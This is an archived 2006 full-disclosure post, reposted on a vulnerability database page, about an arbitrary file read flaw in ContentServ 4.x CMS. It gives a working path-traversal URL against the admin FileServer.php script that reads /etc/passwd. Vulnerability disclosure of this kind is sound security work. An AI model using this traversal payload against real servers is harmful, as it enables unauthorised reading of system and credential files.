Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15271
HistoryDec 01, 2006 - 12:00 a.m.

contentserv 4.x

2006-12-0100:00:00
vulners.com
2227
JSON

ContentServ again (still) features remote reading of arbitrary files

ContentServ is a cms and "cross media publishing" software.

Let me quote from their website:

"At ContentServ, there is always something happening. We continously enhance our products and
services.[…]"

Ok.

Now for the real fun remember:
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0650.html

Still with me? Ok. Lets forget the sql injections for a moment, what if we try:
http://somesite/contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd

Ooops!

have fun!

ps.: alex…when will you EVER learn?!

–
Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen!
Ideal fΓΌr Modem und ISDN: http://www.gmx.net/de/go/smartsurfer

JSON